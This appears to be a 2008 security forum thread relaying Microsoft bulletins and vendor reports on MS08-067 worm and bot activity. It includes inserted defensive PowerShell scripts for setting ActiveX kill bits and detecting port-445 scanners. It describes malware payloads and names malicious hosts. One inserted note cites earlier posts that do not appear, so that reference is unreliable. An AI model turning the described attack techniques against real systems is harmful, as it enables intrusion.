• V2.0 (August 12, 2008): Added known issues link. Also added an entry to the section, Frequently Asked Questions (FAQ) Related to this Security Update, about the known issues and solutions. The solutions include a deployment change for this security update for one issue and a workaround for another. Customers who have successfully updated their systems do not need to reinstall this update.

Microsoft Security Bulletin MS08-033 – Critical
Vulnerabilities in DirectX Could Allow Remote Code Execution (951698)
- http://www.microsoft.com/technet/security/Bulletin/MS08-033.mspx
• V2.1 (August 12, 2008): Added known issues link. Also added an entry to the section, Frequently Asked Questions (FAQ) Related to this Security Update, about the known issues and solutions. The solutions include a change to Microsoft Baseline Security Analyzer (MBSA) 2.1 to correctly detect this update.

Microsoft Security Bulletin MS07-047 - Important
Vulnerabilities in Windows Media Player Could Allow Remote Code Execution (936782)
- http://www.microsoft.com/technet/security/Bulletin/MS07-047.mspx
• V2.0 (August 12, 2008): Added Windows XP Service Pack 3 as affected software. This is a detection change only; there were no changes to the binaries. Customers who have successfully updated their systems do not need to reinstall this update.

Microsoft Security Bulletin MS08-040 – Important
Vulnerabilities in Microsoft SQL Server Could Allow Elevation of Privilege (941203)
- http://www.microsoft.com/technet/security/Bulletin/MS08-040.mspx
• V1.6 (August 12, 2008): Added entry to the Frequently Asked Questions (FAQ) Related to this Security Update to communicate a change in the installation code for the security update for SQL Server 2005 Service Pack 2. This is an installation code change only. There were no changes to the security update binaries.

//

AplusWebMaster
2008-08-13, 15:44
FYI...

Microsoft Security Advisory (953839)
Cumulative Security Update of -ActiveX- Kill Bits
- http://www.microsoft.com/technet/security/advisory/953839.mspx
August 12, 2008 - "Microsoft is releasing a new set of ActiveX kill bits with this advisory. The update includes kill bits for the following third-party software:
• Aurigma Image Uploader. Aurigma has issued an advisory and an update that addresses vulnerabilities...
http://blogs.aurigma.com/post/2008/03/Official-security-bulletin.aspx ...
• HP Instant Support. HP has issued an advisory and an update that addresses vulnerabilities. Please see the advisory from HP for more information...
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01422264 ...
...Customers who are interested in learning more about this update should review Microsoft Knowledge Base Article 953839
- http://support.microsoft.com/kb/953839
August 12, 2008

- http://www.microsoft.com/technet/security/advisory/953839.mspx
• August 13, 2008: Updated to include links to HP’s Advisories
"...HP has issued -2- advisories..."
* http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01422264
** http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01439758

:fear:

AplusWebMaster
2008-08-22, 13:50
FYI...

MS08-051 V2.0 Patch issued August 20, 2008
- http://isc.sans.org/diary.html?storyid=4918
Last Updated: 2008-08-22 00:30:51 UTC - "Microsoft has posted new update packages, labeled Version 2, for Microsoft Office PowerPoint 2003 Service Pack 2 and Microsoft Office PowerPoint 2003 Service Pack 3" described in MS08-051*, Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution... Others should check with their patch management vendors. The original patch "contained incorrect versions of the binaries. While these versions did protect against the vulnerabilities discussed in the bulletin, they lacked other important security and reliability updates..."

* http://www.microsoft.com/technet/security/bulletin/ms08-051.mspx
• V2.0 (August 20, 2008): ...Customers who manually installed Version 1 of this update from Microsoft Download Center need to reinstall Version 2 of this update. Customers who have installed this update using Microsoft Update or Office Update do not need to reinstall..."

:fear:

AplusWebMaster
2008-09-09, 03:08
FYI...

Gotcha: IE8 Lock-In With XP SP3
- http://www.wservernews.com/?id=690
Sep 1, 2008 - "...Redmond on its IE blog* warned XP SP3 users that in some circumstances they will not be able to uninstall either SP3 or IE8. This heads-up was similar to an earlier warning in May, when XP SP3 had just been released. Redmond said then that you wouldn't be able to downgrade from IE7 to the older IE6 browser without uninstalling SP3. Jane Maliouta, an IE program manager, gave specifics about this new gotcha, which impacts you when you downloaded and installed IE8 Beta 1 prior to updating XP to SP3. If you then upgrade IE8 to Beta 2, which Redmond unveiled on the 28th, you will be stuck with both IE8 and Windows XP SP3. You will get a warning dialog:
"If you continue, XP SP3 and IE8 Beta 2 will become permanent, you will still be able to upgrade to later IE8 builds as they become available, but you won't be able to uninstall them."
So how to get around this lock-in? First uninstall XP SP3, then uninstall IE8 Beta 1; then reinstall XP SP3 and follow that by installing IE8 Beta 2. Dang, that's a hassle..."
* http://blogs.msdn.com/ie/archive/2008/08/27/upgrading-to-internet-explorer-8-beta-2.aspx

:thud: :fear:

AplusWebMaster
2008-09-09, 22:27
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-sep.mspx
September 9, 2008 - "The security bulletins for this month are as follows, in order of severity: (Total of -4-)

Critical (4)

Microsoft Security Bulletin MS08-054
Vulnerability in Windows Media Player Could Allow Remote Code Execution (954154)
- http://www.microsoft.com/technet/security/Bulletin/ms08-054.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-052
Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593)
- http://www.microsoft.com/technet/security/Bulletin/ms08-052.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer, .NET Framework, Office, SQL Server, Visual Studio...

Microsoft Security Bulletin MS08-053
Vulnerability in Windows Media Encoder 9 Could Allow Remote Code Execution (954156)
- http://www.microsoft.com/technet/security/Bulletin/ms08-053.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-055
Vulnerability in Microsoft Office Could Allow Remote Code Execution (955047)
- http://www.microsoft.com/technet/security/Bulletin/ms08-055.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

---
ISC Analysis:
- http://isc.sans.org/diary.html?storyid=5009
Last Updated: 2008-09-09 17:46:41 UTC

- http://blogs.technet.com/swi/
Sep. 9, 2008

---
MS08-052
- http://secunia.com/advisories/31675/

MS08-053
- http://secunia.com/advisories/31724/

MS08-054
- http://secunia.com/advisories/31726/

MS08-055
- http://secunia.com/advisories/31744/

---
Revisions...

MS08-052:
- http://www.microsoft.com/technet/security/Bulletin/ms08-052.mspx
• V2.0 (September 12, 2008): Bulletin updated to add Microsoft Office Project 2002 Service Pack 2, all Office Viewer software for Microsoft Office 2003, and all Office Viewer software for 2007 Microsoft Office System as Affected Software...

MS08-053:
- http://www.microsoft.com/technet/security/Bulletin/ms08-053.mspx
• V1.1 (September 10, 2008): Corrected the "Installing without user intervention" and "Installing without restarting" switches in the Security Update Deployment sections for Windows Vista and Windows Server 2008. Also changed "C:\Program Files" to "%programfiles%" in the Workarounds for Windows Media Encoder Buffer Overrun Vulnerability - CVE-2008-3008 commands.

MS08-054:
- http://www.microsoft.com/technet/security/Bulletin/ms08-054.mspx
• V1.1 (September 10, 2008): Removed erroneous entry from Mitigating Factors for Windows Media Player Sampling Rate Vulnerability - CVE-2008-2253.

MS08-055:
- http://www.microsoft.com/technet/security/Bulletin/ms08-055.mspx
• V1.1 (September 10, 2008): Corrected the installation switches and deployment information for OneNote 2007, and added to the list of non-affected software. Also, updated FAQ entries explaining why this update is offered to systems with non-affected software.

:-(

AplusWebMaster
2008-09-19, 16:54
FYI...

- http://www.symantec.com/security_response/threatconlearn.jsp
Sep. 19, 2008 - "The ThreatCon is currently at Level 1. Symantec is currently monitoring in-the-wild attacks leveraging the recently patched Windows Media Player ActiveX vulnerability associated with MS08-053. On September 15, 2008, the DeepSight honeynet observed active exploitation of this flaw as part of a web exploit kit. Successful exploitation of this, or any of the other targeted vulnerabilities, will install malicious code on victim computers. For details on the vulnerability, see the following: Microsoft Windows Media Encoder 9 'wmex.dll' ActiveX Control Remote Buffer Overflow Vulnerability ( http://www.securityfocus.com/bid/31065 ) We strongly urge all users to apply the patches made available in the MS08-053 security bulletin immediately. Those who cannot do so should set the kill bit on the associated CLSID (A8D3AD02-7508-4004-B2E9-AD33F087F43C) until patches can be applied. For more information and patches, see the Microsoft bulletin: Vulnerability in Windows Media Encoder 9 Could Allow Remote Code Execution ( http://www.microsoft.com/technet/security/bulletin/MS08-053.mspx ) ."

:fear:
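
The Websense and Symantec posts above (Snapshot Viewer) and this MS08-053 post all name setting the kill bit on specific CLSIDs as the interim mitigation, and point to KB 240797 for the procedure. The PowerShell below is an added example written for this thread, not code from Microsoft, Symantec, Websense or F-Secure: it sets and then verifies the kill bit for the four CLSIDs quoted in those posts. The registry path and the 0x400 "Compatibility Flags" value are the ones KB 240797 documents; the function names and the loop around them are this example's own.

```powershell
# Added example (not from the forum posts or the quoted vendors): set and verify
# the ActiveX kill bit (KB 240797) for the CLSIDs named in the posts above.
# Run from an elevated PowerShell prompt.

$KillBitFlag = 0x400   # documented "Compatibility Flags" bit that stops IE instantiating the control
$BasePath = 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility'

# CLSIDs quoted in the Snapshot Viewer posts (first three) and the MS08-053 post (wmex.dll)
$Clsids = @(
    'F0E42D50-368C-11D0-AD81-00A0C90DC8D9',
    'F0E42D60-368C-11D0-AD81-00A0C90DC8D9',
    'F2175210-368C-11D0-AD81-00A0C90DC8D9',
    'A8D3AD02-7508-4004-B2E9-AD33F087F43C'
)

function Set-ActiveXKillBit {
    # Example helper (name is this example's own): OR the kill bit into the existing flags
    param([Parameter(Mandatory)][string]$Clsid)
    $key = Join-Path $BasePath "{$Clsid}"
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    # Preserve any other compatibility flags already present for this control
    $current = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $current) { $current = 0 }
    New-ItemProperty -Path $key -Name 'Compatibility Flags' -Value ($current -bor $KillBitFlag) -PropertyType DWord -Force | Out-Null
}

function Test-ActiveXKillBit {
    # Example helper: report whether the kill bit is present, so the change can be audited
    param([Parameter(Mandatory)][string]$Clsid)
    $key = Join-Path $BasePath "{$Clsid}"
    if (-not (Test-Path $key)) { return $false }
    $flags = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    return ($null -ne $flags) -and (($flags -band $KillBitFlag) -ne 0)
}

foreach ($c in $Clsids) {
    Set-ActiveXKillBit -Clsid $c
    $state = if (Test-ActiveXKillBit -Clsid $c) { 'kill bit set' } else { 'NOT set' }
    Write-Output ("{{{0}}}: {1}" -f $c, $state)
}
```

The kill bit does not remove the control from disk; it only prevents Internet Explorer from loading it, so the vendor's patch still needs to be applied. On 64-bit Windows the 32-bit browser reads the same key under HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility, so run the script a second time with $BasePath pointed there.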

AplusWebMaster
2008-10-10, 08:05
FYI...

Microsoft Security Advisory (951306)
Vulnerability in Windows Could Allow Elevation of Privilege
- http://www.microsoft.com/technet/security/advisory/951306.mspx
Published: April 17, 2008 | Updated: October 9, 2008
"Microsoft is investigating new public reports of a vulnerability which could allow elevation of privilege from authenticated user to LocalSystem, affecting Windows XP Professional Service Pack 2, Windows XP Professional Service Pack 3, and all supported versions and editions of Windows Server 2003, Windows Vista, and Windows Server 2008. Customers who allow user-provided code to run in an authenticated context, such as within Internet Information Services (IIS) and SQL Server, should review this advisory. Hosting providers may be at increased risk from this elevation of privilege vulnerability.
Microsoft is aware that exploit code has been published on the Internet for the vulnerability addressed by this advisory. Our investigation of this exploit code has verified that it does not affect customers who have applied the workarounds listed...
Revisions:
• April 17, 2008: Advisory published
• April 23, 2008: Added clarification to impact of workaround for IIS 6.0
• August 27, 2008: Added Windows XP Professional Service Pack 3 as affected software.
• October 9, 2008: Added information regarding the public availability of exploit code...

:fear:

AplusWebMaster
2008-10-14, 15:24
FYI...

MS e-mail spoofs with malware
- http://blogs.technet.com/msrc/archive/2008/10/13/microsoft-security-e-mail-spoofs-with-malware.aspx
October 13, 2008 - "... While malicious e-mails posing as Microsoft security notifications with attached malware aren’t new (we’ve seen this problem for several years) this particular one is a bit different in that it claims to be signed by our own Steve Lipner and has what appears to be a PGP signature block attached to it. While those are clever attempts to increase the credibility of the mail, I can tell you categorically that this is -not- a legitimate e-mail: it is a piece of malicious spam and the attachment is malware. Specifically, it contains Backdoor:Win32/Haxdoor... we never, ever, ever send attachments with our security notification e-mails. And, as a matter of company policy, Microsoft will never send you an executable attachment. If you get an e-mail that claims to be a security notification with an attachment, delete it. It is always a spoof..."

:fear::fear:

AplusWebMaster
2008-10-14, 20:22
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-oct.mspx
October 14, 2008
"This bulletin summary lists security bulletins released for October 2008...

Critical (4)

Microsoft Security Bulletin MS08-060
Vulnerability in Active Directory Could Allow Remote Code Execution (957280)
- http://www.microsoft.com/technet/security/Bulletin/MS08-060.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-058
Cumulative Security Update for Internet Explorer (956390)
- http://www.microsoft.com/technet/security/Bulletin/MS08-058.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer...

Microsoft Security Bulletin MS08-059
Vulnerability in Host Integration Server RPC Service Could Allow Remote Code Execution (956695)
- http://www.microsoft.com/technet/security/Bulletin/MS08-059.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Host Integration Server...

Microsoft Security Bulletin MS08-057
Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (956416)
- http://www.microsoft.com/technet/security/Bulletin/MS08-057.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Important (6)

Microsoft Security Bulletin MS08-066
Vulnerability in the Microsoft Ancillary Function Driver Could Allow Elevation of Privilege (956803)
- http://www.microsoft.com/technet/security/Bulletin/MS08-066.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-061
Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (954211)
- http://www.microsoft.com/technet/security/Bulletin/MS08-061.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-062
Vulnerability in Windows Internet Printing Service Could Allow Remote Code Execution (953155)
- http://www.microsoft.com/technet/security/Bulletin/MS08-062.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-063
Vulnerability in SMB Could Allow Remote Code Execution (957095)
- http://www.microsoft.com/technet/security/Bulletin/MS08-063.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-064
Vulnerability in Virtual Address Descriptor Manipulation Could Allow Elevation of Privilege (956841)
- http://www.microsoft.com/technet/security/Bulletin/MS08-064.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-065
Vulnerability in Message Queuing Could Allow Remote Code Execution (951071)
- http://www.microsoft.com/technet/security/Bulletin/MS08-065.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Moderate (1)

Microsoft Security Bulletin MS08-056
Vulnerability in Microsoft Office Could Allow Information Disclosure (957699)
- http://www.microsoft.com/technet/security/Bulletin/MS08-056.mspx
Maximum Severity Rating: Moderate
Impact of Vulnerability: Information Disclosure
Affected Software: Microsoft Office...

---

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5180
Last Updated: 2008-10-14 18:30:09 UTC

AplusWebMaster
2008-10-14, 21:59
FYI...

Microsoft Security Advisory (956391)
Cumulative Security Update of ActiveX Kill Bits
- http://www.microsoft.com/technet/security/advisory/956391.mspx
October 14, 2008 - "Microsoft is releasing a new set of ActiveX kill bits with this advisory...
This update sets the kill bits for the following third-party software:
• Microgaming Download Helper...
• System Requirements Lab...
• PhotoStockPlus Uploader Tool...
This update sets the kill bits for ActiveX controls addressed in previous Microsoft Security Bulletins. These kill bits are being set in this update as a defense in depth measure:
• Unsafe Functions in Office Web Components (328130), MS02-044.
• Vulnerabilities in Microsoft Office Web Components Could Allow Remote Code Execution (933103), MS08-017.
• Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution (955617), MS08-041.
• Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593), MS08-052.
For more information about installing this update, see Microsoft Knowledge Base Article 956391*."
* http://support.microsoft.com/kb/956391
Last Review: October 14, 2008

:spider:

AplusWebMaster
2008-10-23, 23:56
FYI...

Microsoft Security Bulletin MS08-067
Vulnerability in Server Service Could Allow Remote Code Execution (958644)
- http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx
October 23, 2008 - "...This security update resolves a privately reported vulnerability in the Server service. The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit..."
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...
Exploitability Index: 1 - Consistent exploit code likely...

- http://blogs.technet.com/msrc/archive/2008/10/23/ms08-067-released.aspx
October 23, 2008
- http://blogs.technet.com/swi/archive/2008/10/23/More-detail-about-MS08-067.aspx

---
MS08-067 - exploit in the wild
- http://www.symantec.com/security_response/threatconlearn.jsp
Oct. 23, 2008 - "The ThreatCon is currently at Level 2: Elevated. The DeepSight Threat Analysis Team has updated the ThreatCon to Level 2. Microsoft has released an out-of-band security bulletin to address a Critical flaw in the Server Service (SVRSVC). The vulnerability occurs because of a failure in processing malformed RPC packets sent to the service. By default this issue can be exploited without authentication on Windows 2000, Windows XP, and Windows 2003. Both Windows Vista and Windows Server 2008 are vulnerable, but require authentication by default.
MS08-067 - Vulnerability in Server Service Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
According to the bulletin this vulnerability is being actively exploited in the wild..."
---

- http://securitylabs.websense.com/content/Alerts/3218.aspx
10.23.2008

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4250
10.23.2008

- http://secunia.com/advisories/32326
Release Date: 2008-10-23
Critical: Highly critical
Impact: System access...

- http://isc.sans.org/diary.html?storyid=5227
Last Updated: 2008-10-23 20:58:46 UTC ...Version: 3
"...we believe that client computers need to be updated with all due haste..."

:fear:

AplusWebMaster
2008-10-28, 05:14
FYI...

Microsoft Security Advisory (958963)
Exploit Code Published Affecting the Server Service
- http://www.microsoft.com/technet/security/advisory/958963.mspx
October 27, 2008 - "Microsoft is aware that detailed exploit code demonstrating code execution has been published on the Internet for the vulnerability that is addressed by security update MS08-067*. This exploit code demonstrates code execution on Windows 2000, Windows XP, and Windows Server 2003. Microsoft is aware of limited, targeted active attacks that use this exploit code. At this time, there are no self-replicating attacks associated with this vulnerability. Microsoft has activated its Software Security Incident Response Process (SSIRP) and is continuing to investigate this issue. Our investigation of this exploit code has verified that it does not affect customers who have installed the updates detailed in MS08-067 on their computers. Microsoft continues to recommend that customers apply the updates to the affected products by enabling the Automatic Updates feature in Windows..."
* http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

:fear:

AplusWebMaster
2008-10-30, 22:28
FYI...

Vista updates KB957200 and KB953155
- http://isc.sans.org/diary.html?storyid=5258
Last Updated: 2008-10-30 14:02:45 UTC - "...A few readers are writing in to ask about two recent updates appearing in their queue: KB957200 and KB953155.

KB957200* is listed as a reliability update and according to Microsoft: "this update resolves some performance and reliability issues in Windows Vista. By applying this update, you can achieve better performance and responsiveness in various scenarios. After you install this item, you may have to restart your computer."
* http://support.microsoft.com/kb/957200/en-us

KB953155** is a security update related to MS08-062..."
** http://support.microsoft.com/kb/953155/en-us
Last Review: October 14, 2008
- http://www.microsoft.com/technet/security/bulletin/ms08-062.mspx
Updated: October 29, 2008
Version: 2.2...
"...There were no changes to the security update binaries..."

:fear:

AplusWebMaster
2008-11-01, 20:37
FYI...

- http://www.f-secure.com/weblog/archives/00001525.html
October 31, 2008 - " We are seeing the first Proof of Concept binaries that target the MS08-067 vulnerability on the following English localized systems:
Windows XP Service Pack 2
Windows XP Service Pack 3
Windows 2003 Service Pack 2
The payload is encrypted as normal. Its function is to add the guest account to the administrators group, thus allowing unlimited access to the machine. We detect the binaries as follows:
Backdoor:W32/Agent.DIN
Backdoor:W32/Agent.DIO
Backdoor:W32/Agent.DIP
We'll continue to keep an eye on the events."

:fear: :fear:

AplusWebMaster
2008-11-03, 17:34
FYI...

Worm Exploiting MS08-067 in the Wild
- http://www.f-secure.com/weblog/archives/00001526.html
November 3, 2008 - "Code building on the proof of concept binaries that were mentioned last week has moved into the wild. We've received the first reports of a worm capable of exploiting the MS08-067 vulnerability. The exploit payload downloads a dropper that we detect as Trojan-Dropper.Win32.Agent.yhi. The dropped components include a kernel mode DDOS-bot that currently has a selection of Chinese targets in its configuration. The worm component is detected as Exploit.Win32.MS08-067.g and the kernel component as Rootkit.Win32.KernelBot.dg."

Also see: http://isc.sans.org/diary.html?storyid=5275
Last Updated: 2008-11-03 18:54:56 UTC ...(Version: 3)

:fear:

AplusWebMaster
2008-11-03, 23:46
FYI...

- http://www.theregister.co.uk/2008/11/03/microsoft_intelligence_report/
3 November 2008 - "Malware and unwanted software made strides in the first half of 2008, according to the latest security intelligence report from Microsoft, which tallied a 43 percent increase in the number of programs exorcised by the company's malicious software removal tool. In the first six months of this year, there were some 62 million disinfections on 23.8 million machines, according to the report which was published* Monday. In the second half of last year, 42 million programs were removed on 15 million computers. Because it runs on hundreds of millions of machines worldwide, Microsoft's MSRT, or malicious software removal tool, functions as something of a bellwether for the state of successful attacks affecting Windows computers. The increase was driven in part by the addition of new strains of malware that the MSRT checks for, said Jeff Williams, principal architect for the Microsoft Malware Protection Center. Win32/Taterf, a family of worms that steals login credentials for a host of online games, was one such addition and was removed 2.7 million times. Other causes included the growing aggressiveness of established malware families. Win32/Zlob, a trojan that has bedeviled Windows users for years, was removed 7.5 million times..."
* http://www.microsoft.com/sir

:fear:

AplusWebMaster
2008-11-04, 17:48
More detail...

- http://asert.arbornetworks.com/2008/11/ms08-067-used-to-drop-ddos-bots/
November 3, 2008 - "...The exploit code is 67.exe, and the bot itself is 6767.exe. KernelBot is a Chinese origin DDoS bot... We first became aware of this bot during the CNN.Com attacks earlier this year... If you want to stop this one, you should block all web access to the domain ushealthmart .com. It’s using a few hosts under that domain name to spread and send out configurations... KernelBot can send ICMP, TCP SYN, UDP, and even HTTP flood attacks, among others. It communicates with a server to retrieve the file, usually named “cmd.txt”, which itself is a large INI file describing attacks and next actions..."

- http://isc.sans.org/diary.html?storyid=5288
Last Updated: 2008-11-05 02:53:31 UTC - "...exploiting ip 61.218.147.66. That IP is definitely sequentially scanning ip addresses for tcp 445 looking for vulnerable systems so blocking it at your enterprise gateway is recommended."

:fear:
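
The ISC note above describes the tell-tale of the MS08-067 propagation it saw: one source walking through IP addresses on TCP 445. The PowerShell below is an added example, not part of the ISC diary or the Arbor post: it reads Windows Firewall log lines (the W3C "#Fields" layout pfirewall.log uses) and flags any source that has contacted several distinct hosts on TCP 445, which is what a gateway or host log would show for that scanning. The log lines are constructed for the demonstration with documentation-range addresses, and the threshold of three distinct targets is an assumption to tune for your own network.

```powershell
# Added example (not from the ISC diary or the forum post): flag sources that
# touch many distinct hosts on TCP 445 in a Windows Firewall log.
# The sample lines are constructed; 198.51.100.7 plays the scanner.

$SampleLog = @'
#Version: 1.5
#Software: Microsoft Windows Firewall
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2008-11-04 09:00:01 DROP TCP 198.51.100.7 10.0.0.10 40123 445 48 S 1 0 8192 - - - RECEIVE
2008-11-04 09:00:01 DROP TCP 198.51.100.7 10.0.0.11 40124 445 48 S 1 0 8192 - - - RECEIVE
2008-11-04 09:00:02 DROP TCP 198.51.100.7 10.0.0.12 40125 445 48 S 1 0 8192 - - - RECEIVE
2008-11-04 09:00:02 DROP TCP 198.51.100.7 10.0.0.13 40126 445 48 S 1 0 8192 - - - RECEIVE
2008-11-04 09:00:03 ALLOW TCP 10.0.0.5 10.0.0.20 50231 445 48 S 1 0 8192 - - - SEND
2008-11-04 09:00:03 ALLOW TCP 10.0.0.5 10.0.0.20 50232 445 48 S 1 0 8192 - - - SEND
2008-11-04 09:00:04 ALLOW TCP 10.0.0.5 10.0.0.21 50233 80 48 S 1 0 8192 - - - SEND
'@

function Find-Smb445Scanners {
    # Example function (name is this example's own). Returns one object per
    # source IP that reached at least $MinDistinctTargets different hosts on TCP 445.
    param(
        [Parameter(Mandatory)][string[]]$Lines,
        [int]$MinDistinctTargets = 3   # assumed threshold; a file server talking to many clients needs a higher one
    )
    $targets = @{}   # src-ip -> set (hashtable) of dst-ip seen on 445
    foreach ($line in $Lines) {
        # Skip the W3C header lines and blanks
        if ([string]::IsNullOrWhiteSpace($line) -or $line.StartsWith('#')) { continue }
        $f = $line -split '\s+'
        if ($f.Count -lt 8) { continue }
        $proto = $f[3]; $src = $f[4]; $dst = $f[5]; $dstPort = $f[7]
        if ($proto -ne 'TCP' -or $dstPort -ne '445') { continue }
        if (-not $targets.ContainsKey($src)) { $targets[$src] = @{} }
        $targets[$src][$dst] = $true   # repeated hits on the same host count once
    }
    foreach ($src in $targets.Keys) {
        $n = $targets[$src].Count
        if ($n -ge $MinDistinctTargets) {
            [pscustomobject]@{ SourceIP = $src; DistinctTargets = $n }
        }
    }
}

# With the constructed log: 198.51.100.7 is reported (4 targets); 10.0.0.5 is not
# (two connections, but to a single host on 445).
Find-Smb445Scanners -Lines ($SampleLog -split "`r?`n") | Format-Table -AutoSize
```

To run it against a real log, replace the here-string with `Get-Content "$env:SystemRoot\System32\LogFiles\Firewall\pfirewall.log"` (the default Windows Firewall log location). Counting distinct destinations rather than raw connection counts is what separates a scanner from a busy legitimate SMB client; both the patched MS08-067 systems and the unpatched ones will show up as targets, so the result is a list of sources to block at the gateway, as the ISC note recommends, not a list of compromised hosts.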

AplusWebMaster
2008-11-11, 20:58
FYI...

Hacker tool targeting MS08-067 vuln
- http://securitylabs.websense.com/content/Blogs/3237.aspx
11.11.2008 - "Websense... has noticed a special hacker tool in China. In the past few weeks, Microsoft has announced and released a patch for the MS08-067 vulnerability, and a hacker tool named "wolfteeth bot catcher" has been widely used by hackers to attack machines running Windows operating systems -without- the KB958644 patch... First, the tool drops and runs a backdoor named bycnboy.exe, which moves itself to the system folder and is renamed to windef.exe. This means that hackers who used this tool were themselves hacked by the tool's author. Then a file named project.exe is placed in the temp folder and loaded to run once the original file has finished its job... a Trojan file from the user-defined Web site could be downloaded and executed. All the vulnerable IPs are controlled remotely..."

(Screenshots and more detail available at the URL above.)

:fear:

AplusWebMaster
2008-11-11, 20:59
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-nov.mspx
November 11, 2008 - "This bulletin summary lists security bulletins released for November 2008... (Total of -2-)

Critical (1)

Microsoft Security Bulletin MS08-069
Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution (955218)
- http://www.microsoft.com/technet/security/bulletin/ms08-069.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Important (1)

Microsoft Security Bulletin MS08-068
Vulnerability in SMB Could Allow Remote Code Execution (957097)
- http://www.microsoft.com/technet/security/bulletin/ms08-068.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5330
Last Updated: 2008-11-11 18:28:39 UTC

AplusWebMaster
2008-11-26, 19:23
FYI...

- http://blogs.technet.com/mmpc/archive/2008/11/25/more-ms08-067-exploits.aspx
November 25, 2008 5:37 PM - "As expected, we are seeing another wave of attacks exploiting the vulnerability detailed in security bulletin MS08-067. Early last week... the number of exploits in the wild was still low and they were mostly targeted attacks. However, during the weekend we started receiving customer reports for new malware that exploits this vulnerability. During the last two days that malware gained momentum and as a result we see an increased support call volume... This malware mostly spreads within corporations but also was reported by several hundred home users. It opens a random port between port 1024 and 10000 and acts like a web server. It propagates to random computers on the network by exploiting MS08-067. Once the remote computer is exploited, that computer will download a copy of the worm via HTTP using the random port opened by the worm. The worm often uses a .JPG extension when copied over and then it is saved to the local system folder as a randomly named dll. It is also interesting to note that the worm patches the vulnerable API in memory so the machine will not be vulnerable anymore... We have also found several bots that exploit MS08-067... We continue to urge all our customers to install MS08-067*..."
* http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4250
CVSS v2 Base Score: 10.0 (HIGH)...
Impact Type: Provides administrator access, Allows complete confidentiality, integrity, and availability violation; Allows unauthorized disclosure of information; Allows disruption of service...
- http://www.microsoft.com/security/portal/Entry.aspx?Name=Worm%3aWin32%2fConficker.A
"...Microsoft strongly recommends that users apply the update referred to in Security Bulletin MS08-067 immediately..."

:fear::fear:

AplusWebMaster
2008-12-01, 03:24
FYI...

- http://blog.trendmicro.com/downad-gearing-up-for-a-botnet/
